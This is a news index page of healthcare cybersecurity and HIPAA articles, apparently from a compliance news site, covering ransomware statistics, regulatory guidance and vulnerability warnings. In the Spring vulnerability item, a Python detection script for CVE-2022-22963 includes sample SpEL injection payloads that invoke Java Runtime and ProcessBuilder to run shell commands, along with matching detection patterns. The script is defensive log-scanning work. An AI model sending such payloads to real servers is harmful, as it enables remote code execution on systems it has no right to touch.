The law firm BakerHostetler has published its 8th Annual Data Security Incident Response (DSIR) Report, which provides insights based on 1,270 data security incidents managed by the firm in 2021. 23% of those incidents occurred at healthcare organizations, making healthcare the most targeted sector, and they resulted in HIPAA violation cases.

Ransomware Attacks Increased in 2021

Ransomware attacks have continued to occur at elevated levels, accounting for 37% of all data security incidents handled by the firm in 2021, compared to 27% in 2020, and there are no signs that attacks will decrease in 2022. Attacks on healthcare organizations increased considerably year over year: 35% of healthcare security incidents handled by BakerHostetler in 2021 involved ransomware, up from 20% in 2020. Ransom demands and payments decreased in 2021. In healthcare, the average initial ransom demand was $8,329,520 (median $1,043,480) and the average ransom paid was $875,784 (median $500,846), around two-thirds of the amount paid in 2020. Restoration of files took an...

HIPAA Social Media Rules
Apr12

HIPAA was enacted several years before social media networks such as Facebook and Instagram were launched, so there are no specific HIPAA social media rules. However, as with all healthcare-related communications, the HIPAA Privacy Rule still applies whenever covered entities or business associates – or employees of either – use social media networks. There are many benefits to be gained from using social media. Social media networks allow healthcare organizations to interact with patients and get them more involved in their own healthcare. Healthcare organizations can quickly and easily communicate important messages or provide information about new services. Healthcare providers can attract new patients via social media networks. However, there is also considerable potential for HIPAA Rules and patient privacy to be violated on social media networks. So how can healthcare organizations and their employees use social media without violating HIPAA Rules?

HIPAA and Social Media

Healthcare organizations must implement a HIPAA social media policy to reduce the risk of...

FDA Releases Updated Guidance on Medical Device Cybersecurity
Apr11

The U.S. Food and Drug Administration (FDA) has issued new draft guidance for medical device manufacturers to help them incorporate cybersecurity protections into their products at the premarket stage, and to ensure security risks are managed for the full life cycle of the products. The FDA first released final guidance on premarket expectations for medical devices in 2014, then updated and released draft guidance in 2018. The latest update was deemed necessary due to the changing threat landscape, the increasing use of wireless, Internet- and network-connected devices, portable media, and the frequent electronic exchange of medical device-related health information. Further, the healthcare industry is being increasingly targeted by cyber threat actors, and the severity and clinical impact of healthcare cyberattacks have increased. Cyberattacks on healthcare providers have the potential to delay test results, diagnoses, and treatment, which could lead to patient harm. The FDA felt that an updated approach was necessary to ensure cybersecurity risks were managed and reduced to a low...

NCCoE Releases Final Guidance on Effective Enterprise Patch Management
Apr07

The National Cybersecurity Center of Excellence (NCCoE) has released the final versions of two Special Publications that provide guidance on enterprise patch management practices to prevent the exploitation of vulnerabilities in IT systems. Cybercriminals and nation-state threat actors target unpatched vulnerabilities in software, operating systems, and firmware to gain access to business networks to steal sensitive data and disrupt operations. It is vital for all organizations to ensure patches and software/firmware updates are implemented promptly to prevent exploitation. “Patching is a critical component of preventive maintenance for computing technologies—a cost of doing business, and a necessary part of what organizations need to do in order to achieve their missions,” explained NCCoE. “It helps prevent compromises, data breaches, operational disruptions, and other adverse events.” While the importance of prompt patching is well understood by IT, security, and technology management, the importance and value of patching is typically less well understood by organizations’...

OCR Seeks Comment on Recognized Security Practices and the Sharing of HIPAA Settlements with Harmed Individuals
Apr07

The Department of Health and Human Services’ Office for Civil Rights has released a Request for Information (RFI) related to two outstanding requirements of the Health Information Technology for Economic and Clinical Health Act of 2009 (HITECH Act). The HITECH Act, as amended in 2021 by the HIPAA Safe Harbor Act, requires the HHS to consider the security practices that have been implemented by HIPAA-regulated entities when deciding on financial penalties and other remedies to resolve potential HIPAA violations discovered during investigations and audits. The aim of the HIPAA Safe Harbor Act is to encourage HIPAA-regulated entities to implement cybersecurity best practices. The reward for organizations that have followed industry-standard security best practices for the 12 months prior to a data breach occurring is lower financial penalties for data breaches and less scrutiny by the HHS. Another outstanding requirement, which dates back to when the HITECH Act was signed into law, is for the HHS to share a percentage of the civil monetary penalties (CMPs) and settlement payments...

The Protecting and Transforming Cyber Health Care (PATCH) Act Introduced to Improve Medical Device Cybersecurity
Apr05

A bipartisan pair of senators have introduced the Protecting and Transforming Cyber Health Care (PATCH) Act, which aims to improve the security of medical devices. Vulnerabilities are often identified in medical devices that could potentially be exploited by threat actors to change the functionality of the devices, render them inoperable, or allow the devices to be used as a springboard for more extensive attacks on healthcare networks. Over the course of the pandemic, cyberattacks on healthcare organizations have increased, and medical devices and the networks to which they connect have been affected by ransomware attacks. These attacks have affected hospitals, patients, and the medical device industry. U.S. Senators Bill Cassidy, M.D. (R-LA) and Tammy Baldwin (D-WI) introduced the PATCH Act to ensure that the U.S. healthcare system’s cyber infrastructure remains safe and secure. The PATCH Act would update the Federal Food, Drug, and Cosmetic Act to require all premarket submissions for medical devices to include details of the cybersecurity protections that have been...

Differences Between Small and Large Healthcare Organizations on Security
Apr04

A recent survey of healthcare providers by Software Advice provides insights into healthcare data breaches, their root causes, and the different security practices at small and large healthcare providers. The survey was conducted on 130 small practices with 5 or fewer licensed providers and 129 large practices with six or more providers to understand the security issues they face and the measures each group has taken to protect against cyberattacks and data breaches. Across both groups of healthcare providers, more than half store more than 90% of patient data digitally, such as patient records, medical histories, and billing records. While digital records are more efficient, there is a risk that hackers will be able to gain access to patient information. Hackers tend to target larger practices rather than small practices, based on the number of reported data breaches. 48% of large healthcare providers said they had experienced a data breach in the past, and 16% said they had suffered a breach in the past 12 months. One in four small practices had experienced a breach in the past...

What is the Relationship Between HITECH, HIPAA, and Electronic Health and Medical Records?
Apr02

The Health Insurance Portability and Accountability Act (HIPAA) was signed into law in August 1996 and led to the development of the HIPAA Privacy Rule in 2003 and the HIPAA Security Rule in 2005, but how did the Health Information Technology for Economic and Clinical Health (HITECH) Act change HIPAA, and what is the relationship between HITECH, HIPAA, and electronic health and medical records?

What is the Relationship Between HITECH and HIPAA and Medical Records?

There is a strong relationship between HITECH and HIPAA, as Title II of HIPAA includes the administrative simplification provisions that led to the development of the Privacy and Security Rules, while one of the main aims of the HITECH Act was to encourage the adoption of electronic health and medical records by creating financial incentives for making the transition from paper to digital records. In order to enable the increased adoption of electronic health and medical records and keep the data maintained in these systems secure, the HITECH Act strengthened the HIPAA Privacy and Security Rules, required Business...

Warnings Issued About Vulnerabilities in the Spring Application Building Platform and UPS Devices
Apr01

Two remote code execution vulnerabilities have been identified in the Spring platform, a popular application framework that software developers use for rapidly building Java applications. Proof-of-concept exploits for both vulnerabilities are in the public domain and at least one of the vulnerabilities is being actively exploited. The first vulnerability – CVE-2022-22963 – affects Spring Cloud Function versions 3.1.6, 3.2.2, and older unsupported versions, and is remotely exploitable in the default configuration when running a Spring Boot application that depends on Spring Cloud Function, such as one that depends on the spring-cloud-function-web or spring-cloud-starter-function-web packages. According to VMware, which owns Spring, when the routing functionality is used it is possible for a user to supply a specially crafted SpEL expression as the routing expression, which allows remote code execution and access to local resources. The vulnerability was initially assigned a CVSS severity score of 5.4, but was later upgraded to critical. Proof-of-concept exploits for the vulnerability...
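The routing expression in CVE-2022-22963 is supplied by the client in the spring.cloud.function.routing-expression HTTP header, which is what makes the flaw detectable at a proxy or WAF. As an added example for this page (not code from VMware, the Spring project or the advisory), the Python below runs detection logic over a constructed request log: it normalises header names, extracts that header, and flags SpEL constructs that a legitimate routing expression such as headers.function_name never needs but a code-execution payload almost always does (a type reference like T(java.lang.Runtime), a ProcessBuilder, an exec() call). The log records, IP addresses and field layout are constructed for the example.

```python
import json
import re

# Header whose value Spring Cloud Function evaluates as a SpEL routing expression.
ROUTING_HEADER = "spring.cloud.function.routing-expression"

# SpEL constructs a benign routing expression never needs but an RCE payload does.
SUSPICIOUS = {
    "type_reference": re.compile(r"\bT\s*\(", re.I),                 # T(java.lang.Runtime)
    "runtime_or_processbuilder": re.compile(r"java\.lang\.(Runtime|ProcessBuilder)", re.I),
    "getRuntime": re.compile(r"\bgetRuntime\s*\(", re.I),
    "exec_call": re.compile(r"\bexec\s*\(", re.I),
    "constructor": re.compile(r"\bnew\s+java\.", re.I),              # new java.lang.ProcessBuilder(...)
}

# Constructed sample log: one JSON record per request, as a reverse proxy might emit it.
# These are not real captures; the addresses are documentation ranges.
SAMPLE_LOG = "\n".join([
    '{"ts":"2022-03-31T10:00:01Z","src":"203.0.113.5","method":"POST","path":"/functionRouter",'
    '"headers":{"spring.cloud.function.routing-expression":"T(java.lang.Runtime).getRuntime().exec(\'id\')"}}',
    '{"ts":"2022-03-31T10:00:02Z","src":"198.51.100.7","method":"POST","path":"/functionRouter",'
    '"headers":{"spring.cloud.function.routing-expression":"headers.function_name"}}',
    '{"ts":"2022-03-31T10:00:03Z","src":"198.51.100.8","method":"POST","path":"/uppercase",'
    '"headers":{"content-type":"text/plain"}}',
    '{"ts":"2022-03-31T10:00:04Z","src":"203.0.113.9","method":"POST","path":"/functionRouter",'
    '"headers":{"Spring.Cloud.Function.Routing-Expression":"new java.lang.ProcessBuilder(\'sh\',\'-c\',\'id\').start()"}}',
])


def detect_spel_injection(log_text: str) -> list[dict]:
    """Return one alert per request whose routing expression contains suspicious SpEL."""
    alerts = []
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        rec = json.loads(raw)
        # HTTP header names are case-insensitive; normalise before the lookup so a
        # mixed-case header does not slip past the check.
        headers = {name.lower(): value for name, value in rec.get("headers", {}).items()}
        expr = headers.get(ROUTING_HEADER)
        if expr is None:
            continue
        indicators = [name for name, pattern in SUSPICIOUS.items() if pattern.search(expr)]
        if indicators:
            alerts.append({"ts": rec["ts"], "src": rec["src"], "path": rec["path"],
                           "expression": expr, "indicators": indicators})
    return alerts


if __name__ == "__main__":
    for alert in detect_spel_injection(SAMPLE_LOG):
        print(alert["ts"], alert["src"], alert["path"], alert["indicators"])
```

Detection like this is a stopgap for finding exploitation attempts in proxy logs; the fix is upgrading Spring Cloud Function to 3.1.7 or 3.2.3, where the routing expression is no longer evaluated with full SpEL power.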

Bipartisan Bill Proposed to Strengthen Healthcare and Public Health Sector Cybersecurity
Mar28

A new bill has been proposed by a bipartisan pair of senators that aims to improve the cybersecurity of the healthcare and public health (HPH) sector, in light of the recent warning from the White House about the increased threat of Russian cyberattacks. Last week, President Biden and the White House issued a warning about the increased risk of Russian cyberattacks on critical infrastructure, including potential attacks on the HPH sector, in response to the sanctions recently imposed by the United States on Russia due to the invasion of Ukraine. The warning was “based on evolving intelligence that the Russian Government is exploring options for potential cyberattacks,” said President Biden. In response to the warning, on Thursday, March 24, 2022, U.S. Senators Jacky Rosen (D-NV) and Bill Cassidy, MD (R-LA) proposed the Healthcare Cybersecurity Act (S.3904). One of the main aims of the act is to improve collaboration between the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the U.S. Department of Health and Human Services. If passed, CISA would be required...

FBI: At Least 148 Healthcare Organizations Suffered Ransomware Attacks in 2021
Mar24

The Federal Bureau of Investigation (FBI) Internet Crime Complaint Center (IC3) has released its 2021 Internet Crime Report, which reveals there were at least 649 ransomware attacks on critical infrastructure organizations from June 2021 to December 2021. 14 of the 16 critical infrastructure sectors reported at least one ransomware attack, although the healthcare and public health sector was the worst affected, accounting for 148 of those attacks, followed by financial services with 89 attacks and the information technology sector with 74. The Conti ransomware gang was the most active in 2021 with 87 reported attacks on critical infrastructure organizations, followed by LockBit ransomware (58) and the now-disbanded REvil/Sodinokibi ransomware operation (51). The Conti gang favored targets in critical manufacturing, commercial facilities, and the food and agriculture sectors; LockBit most frequently attacked healthcare and public health, government facilities, and financial services; and REvil targeted healthcare and public health, financial services, and the information technology...

President Biden Urges Private Sector to Take Immediate Action to Harden Cybersecurity Defenses
Mar23

President Biden has issued a warning about the increased threat of cyberattacks by Russian state-sponsored hackers as a result of the economic sanctions imposed on the country in response to the invasion of Ukraine. President Biden said the warning is based on “evolving intelligence that the Russian Government is exploring options for potential cyberattacks.” A few days before President Biden’s warning, the FBI issued an alert warning that hacking groups linked to Russia could target U.S. organizations in response to the recently imposed sanctions. Deputy national security adviser Anne Neuberger explained in a White House briefing on Monday that threat actors associated with Russian IP addresses had conducted “preparatory activity” for cyberattacks, such as scanning websites and other Internet-facing systems at 5 US energy firms for exploitable vulnerabilities. Scans have also been conducted on at least 18 other US companies in sectors such as defense and financial services. The FBI said the Russian IP addresses used for scanning have previously been used for destructive cyber...

How to Become HIPAA Compliant
Mar21

If you would like to start doing business with healthcare organizations you will need to know how to become HIPAA compliant, what HIPAA compliance entails, and how you can prove to healthcare organizations that you have implemented all the required safeguards and privacy controls to ensure the confidentiality, integrity, and availability of any protected health information you will be provided with or given access to.

How to Become HIPAA Compliant

There are no shortcuts if you want to become HIPAA compliant. HIPAA compliance means implementing controls and safeguards to ensure the confidentiality, integrity, and availability of protected health information and developing policies and procedures in line with the Health Insurance Portability and Accountability Act (1996), the HIPAA Privacy Rule (2000), the HIPAA Security Rule (2003), the Health Information Technology for Economic and Clinical Health Act (2009), and the Omnibus Final Rule (2013). To become HIPAA compliant, you will need to study the full text of HIPAA (45 CFR Parts 160, 162, and 164) – which the Department...

OCR: HIPAA Security Rule Compliance Can Prevent and Mitigate Most Cyberattacks
Mar18

Healthcare hacking incidents have been steadily rising for a number of years. There was a 45% increase in hacking/IT incidents between 2019 and 2020, and in 2021, 66% of breaches of unsecured electronic protected health information were due to hacking and other IT incidents. A large percentage of those breaches could have been prevented if HIPAA-regulated entities were fully compliant with the HIPAA Security Rule. The Department of Health and Human Services’ Office for Civil Rights explained in its March 2022 cybersecurity newsletter that compliance with the HIPAA Security Rule will prevent or substantially mitigate most cyberattacks. Most cyberattacks on the healthcare industry are financially motivated and are conducted to steal electronic protected health information or encrypt patient data to prevent legitimate access. The initial access to healthcare networks is gained via tried and tested methods such as phishing attacks and the exploitation of known vulnerabilities and weak authentication protocols, rather than exploiting previously unknown vulnerabilities. Prevention of...

Russian State-Sponsored Actors are Exploiting MFA and the PrintNightmare Vulnerability
Mar17

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) have issued a joint cybersecurity advisory warning that Russian state-sponsored actors are exploiting default multi-factor authentication protocols and the PrintNightmare vulnerability to gain access to networks and steal sensitive data. These tactics have been used by Russian state-sponsored cyber actors from as early as May 2021, when a non-governmental organization (NGO) was attacked using them. The threat actors gained access to the network by exploiting default multi-factor authentication protocols (Cisco’s Duo MFA) on an account. They then exploited the PrintNightmare vulnerability to execute code with SYSTEM privileges, moved laterally to the NGO’s cloud and email accounts, and exfiltrated documents. PrintNightmare is a critical remote code execution vulnerability (CVE-2021-34527) in the Print Spooler service of Microsoft Windows. The attackers were able to enroll a new device in the NGO’s Duo MFA using compromised...

Healthcare Scores Poorly for Practicing the Cyber Incident Response
Mar15

2021 was another record-breaking year for healthcare industry data breaches, with over 50 million records breached and over 900 data breaches recorded by databreaches.net. Given the extent to which the healthcare industry is targeted by cyber actors, the risk of a data breach occurring is high. A SecureLink/Ponemon Institute study in 2021 found 44% of healthcare and pharmaceutical companies had experienced a data breach in the past 12 months. While steps can be taken to improve defenses to prevent cyberattacks from succeeding, healthcare organizations need to be prepared for the worst and should have an incident response plan in place that can be initiated immediately in the event of a cyberattack. With proper planning, healthcare organizations will be well prepared when a cyberattack occurs and will be able to recover in the shortest possible time frame. Regular exercises should be conducted to ensure everyone is aware of their responsibilities and that the plan works. All too often, victims of cyberattacks discover their incident response plan is inefficient or ineffective due...

How to Secure Patient Information (PHI)
Mar13

HIPAA requires healthcare organizations of all sizes to secure protected health information (PHI), but how can covered entities secure patient information? If you are asked how you secure patient information, could you provide an answer?

How Can You Secure Patient Information?

HIPAA requires healthcare organizations and their business associates to implement safeguards to ensure the confidentiality, integrity, and availability of PHI, although there is little detail provided on how to secure patient information in HIPAA regulations. This is intentional, as the pace at which technology is advancing is far greater than the speed at which HIPAA can be updated. If details were included, they would soon be out of date. Technology is constantly changing and new vulnerabilities are being discovered in systems and software previously thought to be secure. Securing patient information is therefore not about implementing security solutions and forgetting about them. To truly secure patient information you must regularly review your security controls, update policies and procedures, maintain...

Breach Barometer Report Shows Over 50 Million Healthcare Records Were Breached in 2021
Mar 11

Protenus has released its 2022 Breach Barometer Report, which confirms 2021 was a particularly bad year for healthcare industry data breaches, with more than 50 million healthcare records exposed or compromised in 2021. The report includes healthcare data breaches reported to regulators, as well as data breaches that have been reported in the media, incidents that have not been disclosed by the breached entity, and data breaches involving healthcare data at non-HIPAA-regulated entities. The data for the report was provided by databreaches.net. Protenus has been releasing annual Breach Barometer reports since 2016, and the number of healthcare data breaches has increased every year, with the number of breached records increasing every year since 2017. It has been confirmed that at least 50,406,838 individuals were affected by healthcare data breaches in 2021, a 24% increase from the previous year. 905 incidents are included in the report, which is a 19% increase from 2020. The largest healthcare data breach of the year affected Florida Healthy Kids Corporation, a...

Warning Issued About Access:7 Vulnerabilities Affecting IoT and Medical Devices
Mar 09

Seven vulnerabilities dubbed Access:7 have been identified in the web-based technologies PTC Axeda and Axeda Desktop Server, which are used to allow one or more people to securely view and operate the same remote desktop via the Internet. If exploited, an attacker could gain full system access, remotely execute code, trigger a denial-of-service condition, read and change configurations, and obtain file system read access and log information access. Three of the vulnerabilities are rated critical and have a CVSS severity score of 9.8 out of 10. PTC Axeda and Axeda Desktop Server are remote asset connectivity software solutions that are used as part of a cloud-based IoT platform. The software is extensively used in medical and Internet-of-Things (IoT) devices to manage and remotely access connected devices, including multiple medical imaging and laboratory devices. At present, none of the vulnerabilities are believed to have been exploited in the wild. The vulnerabilities affect all versions of the software. They are: CVE-2022-25246 – Hard-coded credentials – CVSS Severity Score 9.8/10...

HC3 Report Reveals Cyberattack Trends and Provides Insights to Improve Healthcare Cybersecurity
Mar 08

The HHS’ Health Sector Cybersecurity Coordination Center has released a new report – Health Sector Cybersecurity: 2021 – Retrospective and 2022 Look Ahead – that provides a retrospective look at healthcare cybersecurity over the past 3 decades, detailing some of the major cyberattacks to hit the healthcare industry, starting with the first-ever ransomware attack in 1989. That incident saw biologist Joseph Popp distribute 20,000 floppy disks at the World Health Organization AIDS conference in Stockholm. When used, the disks installed malicious code which tracked reboots. After 90 reboots, a ransom note was displayed that claimed the software lease had expired and a payment of $189 was required to regain access to the system. The report shows how adversaries stepped up their attacks on the healthcare industry from 2014 through 2017. In 2014, Boston Children’s Hospital suffered a major distributed denial-of-service (DDoS) attack, and there was a massive cyberattack on Anthem Inc. in 2015 that resulted in the unauthorized accessing of the records of 80 million health plan...

HSCC Releases Model Contract Template for HDOs and Medical Device Manufacturers
Mar 07

The Healthcare and Public Health Sector Coordinating Council (HSCC) has published a new Model Contract Language template for healthcare delivery organizations (HDOs) to use when procuring new devices from medical device manufacturers (MDMs) to ensure each party is aware of its responsibilities for cybersecurity and device management. “Medical device cybersecurity responsibility and accountability between MDMs and HDOs is complicated by many conflicting factors, including uneven MDM capabilities and investment in cybersecurity controls built into device design and production; varying expectations for cybersecurity among HDOs; and high cybersecurity management costs in the HDO operational environment through the device lifecycle,” explained HSCC. “These factors have introduced and sustained ambiguities in cybersecurity accountability between MDMs and HDOs that historically have been reconciled at best inconsistently in the purchase contract negotiation process, leading to downstream disputes and potential patient safety implications.” The Model Contract Language is intended to be a...

Poor Employee Cyber Hygiene is Putting Healthcare Cybersecurity at Risk
Mar 07

There have been calls for healthcare organizations to take steps to improve security due to a major rise in hacking incidents, ransomware attacks, and vulnerability disclosures in 2021. Record numbers of healthcare data breaches were reported last year, and tens of millions of healthcare records were compromised. Adhering to the minimum requirements of the HIPAA Security Rule and conducting risk analyses, having robust risk management practices, conducting vulnerability scans, and implementing technical safeguards such as intrusion prevention systems, next-generation firewalls, and spam filters are all important measures to improve cybersecurity and ensure HIPAA compliance, but it is also important to improve the human aspect of cybersecurity. Risky employee behaviors need to be eradicated and the workforce needs to be trained to be more security-aware and taught how to recognize common attacks that target individuals, such as phishing and social engineering. The human aspect of cybersecurity is often one of the weakest links in the security chain, which has been highlighted by a...

Security Issues Identified in 75% of Infusion Pumps
Mar 04

This week, researchers at Palo Alto’s Unit 42 team published a report that shows security gaps and vulnerabilities often exist in smart infusion pumps. These bedside devices automate the delivery of medications and fluids to patients and are connected to networks to allow them to be remotely managed by hospitals. The researchers used crowdsourced scans from more than 200,000 infusion pumps at hospitals and other healthcare organizations and searched for vulnerabilities and security gaps that could potentially be exploited. The devices were assessed against more than 40 known vulnerabilities and over 70 other IoT vulnerabilities. 75% of the 200,000 infusion pumps were discovered to have security gaps that placed them at an increased risk of being compromised by hackers. Worryingly, 52% of the analyzed devices were found to be vulnerable to two serious infusion pump vulnerabilities dating back to 2019, one of which is a critical flaw with a CVSS severity score of 9.8 out of 10 (Wind River VxWorks CVE-2019-12255), and the other is a high severity flaw with a CVSS score of 7.1 (Wind...

Paying a Ransom Doesn’t Put an End to the Extortion
Mar 02

The healthcare industry has been extensively targeted by ransomware gangs, and victims often see paying the ransom as the best option to ensure a quick recovery, but the payment does not always put an end to the extortion. Many victims have paid the ransom to obtain the decryption keys or to prevent the publication of stolen data, only for the ransomware actors to continue with the extortion. The advice of the Federal Bureau of Investigation (FBI) is never to pay a ransom following a ransomware attack, as doing so allows the threat actors to put more resources into their attacks, it encourages other threat groups to get involved in ransomware, and there is no guarantee that paying a ransom will allow the recovery of data or prevent the misuse of stolen data. A recent survey conducted by the cybersecurity firm Venafi has helped to quantify the extent to which further extortion occurs. The survey has provided some important statistics about what happens when victims pay or do not pay the ransom demands. The survey was conducted on 1,506 IT security officers from the United...

HHS Warns of Potential Threats to the Healthcare Sector
Mar 02

The Department of Health and Human Services’ Health Sector Cybersecurity Coordination Center (HC3) has issued a warning to the U.S. health sector about potential cyber threats that could spill over from the conflict in Ukraine and affect U.S. healthcare organizations. HC3 said the HHS is unaware of any specific threats to the Health and Public Health (HPH) Sector; however, it is clear that allies on both sides of the conflict have cyber capabilities and there are fears that there could be cyberattacks on the HPH sector as a consequence of the conflict. HC3 has warned that threats could come from three areas: threat actors linked to the Russian government, threat actors linked to the Belarusian government, and cybercriminal groups operating out of Russia and its neighboring states. There is also potential for other cybercriminal groups to either get involved in the conflict or take advantage of the conflict to conduct unrelated cyberattacks. “Russia has for several decades been one of the most capable cyber powers in the world. Going back to the Moonlight Maze attacks against the US...

OCR Director Encourages HIPAA-Regulated Entities to Strengthen Their Cybersecurity Posture
Mar 01

In a recent blog post, Director of the HHS’ Office for Civil Rights, Lisa J. Pino, urged HIPAA-regulated entities to take steps to strengthen their cybersecurity posture in 2022 in light of the increase in cyberattacks on the healthcare industry. 2021 was a particularly bad year for healthcare organizations, with the number of reported healthcare data breaches reaching record levels. 714 healthcare data breaches of 500 or more records were reported to the HHS’ Office for Civil Rights in 2021 and more than 45 million records were breached. The breach reports were dominated by hacking and other IT incidents that resulted in the exposure or theft of the healthcare data of more than 43 million individuals. In 2021, hackers took advantage of healthcare organizations dealing with the COVID-19 pandemic and conducted several attacks that had a direct impact on patient care and resulted in canceled surgeries, medical examinations, and other services as a result of IT systems being taken offline and network access being disabled. Pino also drew attention to the critical vulnerability...

NIST Requests Comments on How to Improve its Cybersecurity Framework
Feb 28

The National Institute of Standards and Technology (NIST) is seeking feedback on the usefulness of its Framework for Improving Critical Infrastructure Cybersecurity (NIST Cybersecurity Framework) and suggestions on any improvements that can be made. The NIST Cybersecurity Framework was released in 2014 to help public and private sector organizations implement cybersecurity standards and best practices to improve their cybersecurity posture, better defend against cyber threats, and quickly identify and respond to cyberattacks in progress to limit the harm that can be caused. The NIST Cybersecurity Framework is considered the gold standard for cyber threat management; however, that does not mean improvements could not be made. The last update to the Cybersecurity Framework occurred in April 2018 and the past four years have seen considerable changes to the cybersecurity threat landscape. New threats have emerged, the tactics, techniques, and procedures used by cyber threat actors have changed, there are new technologies and security capabilities, and more resources are available to...

NCCoE Releases Final Version of NIST Securing Telehealth Remote Patient Monitoring Ecosystem Guidance
Feb 23

The National Cybersecurity Center of Excellence (NCCoE) has published the final version of NIST guidance on Securing Telehealth Remote Patient Monitoring Ecosystem (SP 1800-30). Healthcare delivery organizations have been increasingly adopting telehealth and remote patient monitoring (RPM) systems to improve the care they provide to patients while reducing costs. Patient monitoring systems have traditionally only been used in healthcare facilities, but there are advantages to using these solutions in patients’ homes. Many patients prefer to receive care at home, the cost of receiving that care is reduced, and healthcare delivery organizations benefit from freeing up bed space and being able to treat more patients. While there are advantages to be gained from the provision of virtual care and the remote monitoring of patients in their homes, telehealth and RPM systems can introduce vulnerabilities that could put sensitive patient data at risk, and if RPM systems are not adequately protected, they could be vulnerable to cyberattacks that could disrupt patient monitoring services....

CISA Publishes List of Free Cybersecurity Tools to Advance Security Capabilities
Feb 23

Expanding security capabilities is possible with a tight budget by using free cybersecurity tools and services. Many tools and services have been developed by government agencies, the cybersecurity community, and the public and private sector that can be used to improve defenses against damaging cyberattacks, detect potential intrusions rapidly, and help organizations respond to and remediate security breaches. Finding appropriate free cybersecurity tools and services can be a time-consuming process. To help critical infrastructure organizations reduce cybersecurity risk, the DHS’ Cybersecurity and Infrastructure Security Agency (CISA) has compiled a list of services provided by CISA and other government agencies, open source tools, and tools and services developed and maintained by the cybersecurity community that can be adopted to improve protection, detection, response and the remediation of cyber threats. The list of free cybersecurity tools and services is divided into four categories, based on the four goals detailed in previously published guidance: CISA Insights:...

HHS Raises Awareness of Threats to Electronic Health Record Systems
Feb 21

The U.S. Department of Health and Human Services’ Health Sector Cybersecurity Coordination Center has issued a threat brief warning about the risks associated with electronic health record systems, which are often targeted by cyber threat actors. Cyberattacks on EHRs can be extremely profitable for cyber threat actors. EHRs usually contain all the information required for multiple types of fraud, including names, addresses, dates of birth, Social Security numbers, other government and state ID numbers, health data, and health insurance information. No other records provide such a wide range of information. The information contained in the systems has a high value on the black market and can be easily sold to cybercriminals who specialize in identity theft and tax and insurance fraud. Malware, and especially ransomware, poses a significant threat to EHRs. Ransomware can be used to encrypt EHR data to prevent access, which causes disruption to medical services and creates patient safety issues, which in turn increases the likelihood of the ransom being paid. Phishing attacks to gain access to...

2021 Saw Sharp Increase in Ransomware Data Leaks and Ransom Demands
Feb 18

CrowdStrike has released its annual threat report, which shows there was a major increase in data leaks following ransomware attacks in 2021, rising 82% from 2020. CrowdStrike observed 2,686 ransomware attacks in 2021 compared to 1,474 in 2020. There were more than 50 ransomware attacks a week in 2021. Ransomware gangs also increased their ransom demands in 2021, which were 36% higher than in 2020. In 2021, the average ransom demand was $6.1 million. The healthcare industry was extensively targeted by ransomware gangs in 2021, even though several threat actors claimed they would not conduct attacks on healthcare organizations. CrowdStrike tracked 154 ransomware attacks on healthcare organizations in 2021, up from 94 in 2020, with healthcare ranking 6th out of all industry sectors for data leaks, down from 4th position in 2020. CrowdStrike said the threat landscape became much more crowded in 2021, with several new adversaries emerging, including threat actors from countries that have previously not been extensively involved in cyberattacks, such as Turkey and Colombia. CrowdStrike identified 21 new...

HIMSS Cybersecurity Survey Suggests the Human Factor is the Largest Vulnerability in Healthcare
Feb 17

The Healthcare Information and Management Systems Society (HIMSS) has published the findings of its 2021 Healthcare Cybersecurity Survey which revealed 67% of respondents have experienced at least one significant security incident in the past 12 months, with the most significant security breaches the result of phishing attacks. The 2021 HIMSS Healthcare Cybersecurity Survey was conducted on 167 healthcare cybersecurity professionals, who had at least some responsibility for day-to-day cybersecurity operations or oversight. The surveyed IT professionals were asked about the most significant security breaches they had experienced in the previous 12 months, and in 45% of cases it was a phishing attack, and 57% of respondents said the most significant breach involved phishing. Phishing attacks are most commonly conducted via email, with email-based phishing attacks accounting for 71% of the most significant security incidents; however, 27% said there was a significant voice phishing incident (vishing), 21% said they had a significant SMS phishing incident (smishing), and 16% said there...

CISA, FBI, NSA Warn of Increased Threat of Ransomware Attacks on Critical Infrastructure
Feb 14

A joint security advisory has been issued by cybersecurity agencies in the United States, United Kingdom, and Australia, warning about the increased globalized threat of ransomware attacks and the elevated risk of targeted attacks on critical infrastructure entities. The Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), and the National Security Agency (NSA) have observed high-impact ransomware attacks against 14 of the 16 critical infrastructure sectors in 2021, including government facilities, financial services, transportation systems, water and wastewater systems, energy, and healthcare and public health. The UK’s National Cyber Security Centre (NCSC-UK) says ransomware is now the biggest cyber threat faced by the country, with education the most targeted sector. There has also been an increase in attacks on businesses, charities, law firms, local government public services, and the healthcare sector. The Australian Cyber Security Centre (ACSC) says ransomware gangs are targeting critical infrastructure sectors including...

What is Considered PHI?
Feb 13

In response to questions sent to HIPAA Journal, we have written a series of posts explaining some of the basic elements of HIPAA, the latest being: what is considered PHI? What is PHI, PII, and IIHA? Terms such as PHI and PII are commonly referred to in healthcare, but what do they mean and what information do they include? PHI is an acronym for Protected Health Information, while PII is an acronym for Personally Identifiable Information. Before explaining these terms, it is useful to first explain what is meant by health information, of which protected health information is a subset. Health information is information related to the provision of healthcare or payment for healthcare services that is created or received by a healthcare provider, public health authority, healthcare clearinghouse, health plan, business associate of a HIPAA-covered entity, or a school/university or employer. Health information relates to past, present, and future health conditions or physical/mental health that is related to the provision of healthcare services or payment for those services. Personally...

Immediate Patching Required to Fix Critical SAP Vulnerabilities
Feb 10

The German business software provider SAP has released patches to fix a set of critical vulnerabilities that affect SAP applications that use the SAP Internet Communications Manager (ICM). The vulnerabilities were identified by researchers at Onapsis Research Labs, who dubbed the flaws ICMAD (Internet Communications Manager Advanced Desync). All three of the flaws could be exploited to achieve remote code execution, which would allow remote attackers to fully compromise vulnerable SAP applications. The vulnerabilities affect the following SAP applications: SAP NetWeaver AS ABAP, ABAP Platform, SAP NetWeaver AS Java, SAP Content Server 7.53, and SAP Web Dispatcher. The flaws could be exploited to steal victim sessions and credentials in plaintext, change the behavior of applications, obtain PHI and sensitive business data, and cause a denial of service. The vulnerability CVE-2022-22536 is the most serious of the three and has been assigned the maximum CVSS severity score of 10/10. Onapsis said the flaw can be easily exploited by an unauthenticated attacker on SAP applications in the default...

Latest Phishing Kits Allow Multi-Factor Authentication Bypass
Feb 09

